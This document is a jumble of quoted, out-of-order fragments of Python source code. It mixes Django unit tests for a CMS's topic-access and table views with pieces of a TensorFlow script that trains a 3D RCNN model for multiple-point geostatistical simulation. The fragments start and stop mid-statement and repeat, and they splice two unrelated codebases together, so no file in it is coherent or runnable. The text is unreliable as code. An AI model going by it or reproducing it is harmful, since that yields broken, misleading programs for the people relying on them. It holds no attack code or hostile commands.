kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))", "= reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request", "= self.user # Exercise test try: response = get_topic(request, self.dep.id,", "Exercise test response = get_topic(request, self.dep.id, self.topic.id) # Assert test", "department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep)", "= True # Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup", "test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request =", "import University, Faculty, Department, UserProfile from cms.models import Topic from", "data = {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test", "# Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self): self.user", "Exercise test request = self.client.get(url) # Assert test self.assertEqual(302, request.status_code)", "990) flag = False except Http404: flag = True #", "test request = self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request,", "= User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac)", "request.status_code) class UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>')", "# Setup test request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id':", "User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user,", "term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id':", "Setup test url = reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") #", "another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id,", "self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup test request = RequestFactory()", "self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test url = reverse('web_user_table')", "self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test request", "= self.user # Exercise test response = get_topic(request, self.dep.id, self.topic.id)", "self.topic.id})) request.user = self.user # Exercise test outsider_topic = Topic.objects.create(name='ms',", "outsider_topic.department.add(self.dep) try: response = get_topic(request) flag = False except Http404:", "self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup test user = User.objects.create_user(", "faculty') self.dep = Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep)", "def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create()", "email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep", "UserProfile from cms.models import Topic from cms.views import get_topic class", "self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test request = RequestFactory() request", "# Setup test user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' )", "class AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni", "Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test another_topic =", "TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac =", "from django.core.urlresolvers import resolve from django.urls import reverse from django.test", "# Setup test another_topic = Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac,", "Http404: flag = True # Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self):", "self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url, data=data) #", "another_topic = Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic)", "from django.http import HttpRequest, Http404 from django.contrib.auth.models import User from", "outsider_topic.id) flag = False except Http404: flag = True #", "Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic", "RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user =", "url = reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test", "def test_return_topic_that_does_not_exist(self): # Setup test request = RequestFactory() request =", "skip from users.models import University, Faculty, Department, UserProfile from cms.models", "Setup test url = reverse('web_user_table') data = {} request =", "request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url)", "test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request, self.dep.id, outsider_topic.id)", "url = reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test", "url = reverse('web_user_table') data = {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\")", "= UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup test url", "reverse from django.test import TestCase, RequestFactory from django.http import HttpRequest,", "Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test", "password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep =", "self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): #", "self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test", "another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") #", "= Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response", "password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user,", "= reverse('web_user_table') data = {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") #", "self.fac = Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep') self.profile =", "self.user # Exercise test response = get_topic(request, self.dep.id, self.topic.id) #", "self.topic.id})) request.user = self.user # Exercise test response = get_topic(request,", "except Http404: flag = True # Assert test self.assertTrue(flag) def", "Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1)", "# Exercise test try: response = get_topic(request, self.dep.id, 990) flag", "cms.models import Topic from cms.views import get_topic class AccessRestriction(TestCase): def", "get_topic(request, self.dep.id, 990) flag = False except Http404: flag =", "# Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test request", "'topic_id': self.topic.id})) request.user = self.user # Exercise test outsider_topic =", "email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\")", "request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url,", "self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self):", "import User from unittest import skip from users.models import University,", "reverse('web_user_table') data = {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise", "Http404: flag = True # Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self):", "response.status_code) def test_return_topic_that_has_different_department(self): # Setup test request = RequestFactory() request", "self.client.get(url) # Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self):", "Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self): self.user =", "test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test", "def test_post_when_no_choices(self): # Setup test url = reverse('web_user_table') data =", "def test_return_topic_that_has_different_department(self): # Setup test request = RequestFactory() request =", "test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request) flag =", "django.contrib.auth.models import User from unittest import skip from users.models import", "Http404: flag = True # Assert test self.assertTrue(flag) class TableViews(TestCase):", "Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request =" ]
[ "numpy as np import tensorflow as tf import time import", "import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ##", "IPsizex - Num 6 HyperPar.append(int(7)) # IPsizey - Num 7", "StepLR = 10 PointStart = 1 for indTrain in range(Ncicles):", "It has been developed by <NAME> and <NAME> in the", "code is the Version 1.0 of the RCNN approach to", "- Num 3 HyperPar.append(int(7)) # Search_y - Num 4 HyperPar.append(int(7))", "\"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch = 1 #Nbatch", "TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples,", "whole training process-\" % (np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\"", "HyperPar.append(50) # SGsizez - Num 2 HyperPar.append(int(7)) # Search_x -", "print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch,", "gc for ind0 in range(1): start_time_AllTrain = time.time() HyperPar =", "- Num 7 HyperPar.append(int(7)) # IPsizez - Num 8 HyperPar.append(50)", "print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the TI", "Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart))", "+ MinLR, decimals=7) else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR -", "been developed by <NAME> and <NAME> in the Geometallurygical Group", "of categories - Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \",", "LR=LearningRate) print(\"--%s seconds of whole training process-\" % (np.around((time.time() -", "University - Canada\"\"\" # Do not display the AVX message", "- Num 6 HyperPar.append(int(7)) # IPsizey - Num 7 HyperPar.append(int(7))", "Conditioning - Num 9 .. divided by 3 so 1%", "Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate)", "print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s", "categories - Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8]))", "Fully Connected - Num 11 HyperPar.append(3) # wdnh - Num", "250 Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]),", "#LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar,", "HyperPar.append(16) # convdepth - Num 13 HyperPar.append(2) # num of", "- Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles", "Num 10 HyperPar.append(1500) # Num Fully Connected - Num 11", "device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## #########################", "#os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy", "cuos) + MaxLR, decimals=7) start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart),", "convdepth - Num 13 HyperPar.append(2) # num of categories -", "HyperPar.append(50) # Percentage of Data Conditioning - Num 9 ..", "represents 1% HyperPar.append(1) # MinDC - Num 10 HyperPar.append(1500) #", "Version 1.0 of the RCNN approach to perform MPS in", "decimals=7) start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \",", "2 HyperPar.append(int(7)) # Search_x - Num 3 HyperPar.append(int(7)) # Search_y", "= indTrain%(2*StepLR) if cuos < StepLR: LearningRate = np.around(((MaxLR -", "Geomet Group - Queen's University - Canada\"\"\" # Do not", "[] HyperPar.append(50) # SGsizex - Num 0 HyperPar.append(50) # SGsizey", "RCNN approach to perform MPS in 3D for categorical variables.", "comments and further improvements are well recevied to: <EMAIL> April", "# IPsizex - Num 6 HyperPar.append(int(7)) # IPsizey - Num", "TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of", "cuos = indTrain%(2*StepLR) if cuos < StepLR: LearningRate = np.around(((MaxLR", "using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import", "- Num 12 HyperPar.append(16) # convdepth - Num 13 HyperPar.append(2)", "<NAME> in the Geometallurygical Group at Queen's University as part", "Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\")", "1 HyperPar.append(50) # SGsizez - Num 2 HyperPar.append(int(7)) # Search_x", "Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile,", "np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos < StepLR: LearningRate =", "np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7) start_time_1 =", "MaxLR, MinLR = 0.01, 0.001 StepLR = 10 PointStart =", "range(1): start_time_AllTrain = time.time() HyperPar = [] HyperPar.append(50) # SGsizex", "# MinDC - Num 10 HyperPar.append(1500) # Num Fully Connected", "= np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7) start_time_1", "LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate", "of a PhD program. The code is not free of", "fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar,", "# Num Fully Connected - Num 11 HyperPar.append(3) # wdnh", "LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]),", "GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import device_lib", "1% HyperPar.append(1) # MinDC - Num 10 HyperPar.append(1500) # Num", "# SGsizey - Num 1 HyperPar.append(50) # SGsizez - Num", "AVX message about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'", "import numpy as np import tensorflow as tf import time", "Queen's University as part of a PhD program. The code", "######################### import numpy as np import tensorflow as tf import", "4 HyperPar.append(int(7)) # Search_z - Num 5 HyperPar.append(int(7)) # IPsizex", "7 HyperPar.append(int(7)) # IPsizez - Num 8 HyperPar.append(50) # Percentage", "# see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as", "start_time_AllTrain = time.time() HyperPar = [] HyperPar.append(50) # SGsizex -", "wdnh - Num 12 HyperPar.append(16) # convdepth - Num 13", "as np import tensorflow as tf import time import External_Functions_3D", "indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if", "#fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the TI TempSimGrid", "500 Nepoch = 1 #Nbatch = 250 Nsamples = 512", "Group at Queen's University as part of a PhD program.", "in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos", "= 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]),", "'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar,", "Search_y - Num 4 HyperPar.append(int(7)) # Search_z - Num 5", "Num 5 HyperPar.append(int(7)) # IPsizex - Num 6 HyperPar.append(int(7)) #", "IPsizey - Num 7 HyperPar.append(int(7)) # IPsizez - Num 8", "# Search_z - Num 5 HyperPar.append(int(7)) # IPsizex - Num", "13 HyperPar.append(2) # num of categories - Num 14 print(\"SG:", "PhD program. The code is not free of bugs but", "by <NAME> and <NAME> in the Geometallurygical Group at Queen's", "Canada\"\"\" # Do not display the AVX message about using", "for ind0 in range(1): start_time_AllTrain = time.time() HyperPar = []", "- start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s minutes of ALL", "Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel,", "int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile", "Grid]\") TempSimGrid.SaveGrid(file=\"{}/TrainReas_{}.txt\".format(LocFile, indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds", "developed by <NAME> and <NAME> in the Geometallurygical Group at", "# Percentage of Data Conditioning - Num 9 .. divided", "LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole training process-\" % (np.around((time.time()", "else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR,", "import External_Functions_3D as fns_nested import gc for ind0 in range(1):", "{}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5,", "TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart),", "issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as np import", "= 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]),", "int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel)", "to: <EMAIL> April 16, 2019. Geomet Group - Queen's University", "- Num 10 HyperPar.append(1500) # Num Fully Connected - Num", "bugs but running end-to-end. Any comments and further improvements are", "#from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue #152", "at Queen's University as part of a PhD program. The", "DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\")", "HyperPar.append(1) # MinDC - Num 10 HyperPar.append(1500) # Num Fully", "divided by 3 so 1% is 10 represents 1% HyperPar.append(1)", "Num 1 HyperPar.append(50) # SGsizez - Num 2 HyperPar.append(int(7)) #", "= np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate =", "= 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]),", "\", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch =", "int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]),", "not free of bugs but running end-to-end. Any comments and", "'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]),", "perform MPS in 3D for categorical variables. It has been", "Num 11 HyperPar.append(3) # wdnh - Num 12 HyperPar.append(16) #", "import time import External_Functions_3D as fns_nested import gc for ind0", "not display the AVX message about using GPU import os", "10 HyperPar.append(1500) # Num Fully Connected - Num 11 HyperPar.append(3)", "3 HyperPar.append(int(7)) # Search_y - Num 4 HyperPar.append(int(7)) # Search_z", "Connected - Num 11 HyperPar.append(3) # wdnh - Num 12", "- Canada\"\"\" # Do not display the AVX message about", "program. The code is not free of bugs but running", "int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]),", "print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole training", "training process-\" % (np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\" \")", "External_Functions_3D as fns_nested import gc for ind0 in range(1): start_time_AllTrain", "print(\"--%s seconds of whole training process-\" % (np.around((time.time() - start_time_1),", "int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]),", "0.001 StepLR = 10 